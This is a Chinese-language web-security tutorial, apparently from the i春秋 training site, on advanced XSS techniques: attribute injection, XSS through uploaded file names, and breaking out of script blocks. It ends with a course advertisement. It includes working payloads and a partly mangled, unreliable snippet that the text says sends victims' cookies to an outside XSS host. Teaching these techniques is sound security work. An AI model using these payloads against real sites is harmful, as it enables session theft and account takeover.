XSS漏洞是Web应用程序中最常见的漏洞之一,想要入门Web安全的小伙伴,这个知识点是必学的。
i春秋官网中有很多关于XSS漏洞的课程,新手小白可以去官网看课学习。
学习地址:https://www.ichunqiu.com/search/XSS漏洞
XSS是一种经常出现在Web应用中的计算机安全漏洞,也是客户端脚本安全的头号大敌。今天i春秋跟大家分享的是XSS漏洞的进阶篇,如何利用XSS漏洞的一些小技巧,希望对大家学习Web安全有所帮助。
污染标签
简单的说,XSS漏洞的本质就是输入与输出。
比如,我的QQ网名是:
"你的网名">
结果就被污染成
<input value="">
这样的话我就成功弹窗了,但又有什么用呢?
我们可以构造语句:
<input value=""#ff0000">http%3A%2F%2Fxssnow.com%2FdZJ4%3F%22%2BMath.random%28%29%3B%28document.getElementsByTagName%28%22HEAD%22%29%5B0%5D%7C%7Cdocument.body%29.appendChild%28b%29%3B/.source));">
这样我们就能成功打到cookie了。
文件名称XSS
有些网站有上传点,但是后台并未对文件名做更改。
比如上传以后前端代码是这样的:
<a href="http://127.0.0.1/upload/1.rar">test</a>
1.rar假设就是我们上传的文件。
我们是不是又可以构造语句闭合或者污染标签,值得一提的是,你需要抓包改文件名(想在Windows环境下改,你去试试就知道是怎么回事了)
我们就改成:
"><script>alert(1)</script>.rar
这样的话,就变成:
成功弹窗,如果过滤了尖括号 < >
就可以按照之前讲的标签污染法,让它执行我们的JS语句。
闭合JS
有时候,JS会调用我们网站的一些资料,类似昵称。
<html>
<head>
<script>
name = sqler;
</script>
</head>
<body>
welcome sqler;
</body>
</html>
因为我们昵称是被包含在<head>里,我们无法利用。
这样我们就需要为它打开一个新大门。
</script></head><body><img src=x onerror=alert(1)>
这样我们就成功弹窗。
以上就是今天要分享的内容,是不是很简单。
XSS漏洞是Web安全入门必掌握的知识点,当然还有CSRF漏洞、Webshell与文件上传漏洞、SQL注入等等,如果想要全面系统的学习Web安全入门课程,可以到i春秋官网(ichunqiu.com/train)进行报名。
快速报名入口:https://www.ichunqiu.com/train/course/11
面向人群
信息安全小白、高等院校信息安全、网络空间安全专业学生、信息安全爱好者、Web应用开发人员。
学习方式
通过在线视频学习资源,结合实验练习,带你全方位学习Web安全。上课期间助教老师实时在互动区进行沟通答疑,若脱离上课时间可在班级内老师答疑模块中进行问题咨询留言。
学习时间
Web安全入门班每月有两次报名机会,大家可以根据自己实际情况进行相应选择,学习时间灵活,非常适合上班族的新手小白们。
课程目标
1、了解Web应用程序架构;
2、熟悉Web常见漏洞原理;
3、掌握Web基础安全漏洞利用方式与防御方法;
4、熟悉渗透测试流程;
5、熟练使用多种渗透测试工具。
课程介绍
课程以漏洞为核心,从Web应用架构、漏洞原理,利用方式与防御方法等,多方面剖析Web应用安全相关知识,并以此为基础学习渗透测试的操作流程及各阶段工作内容,熟悉渗透测试工具的使用。
课程优势
1、低门槛、易学习;
2、知识点配套实验;
3、助教老师答疑。
通过以上内容的介绍,如果还有其他疑问,欢迎大家前来咨询,我们会有更专业的老师为你讲解,给你答疑解惑。谢老师 18513200565(手机、微信同步)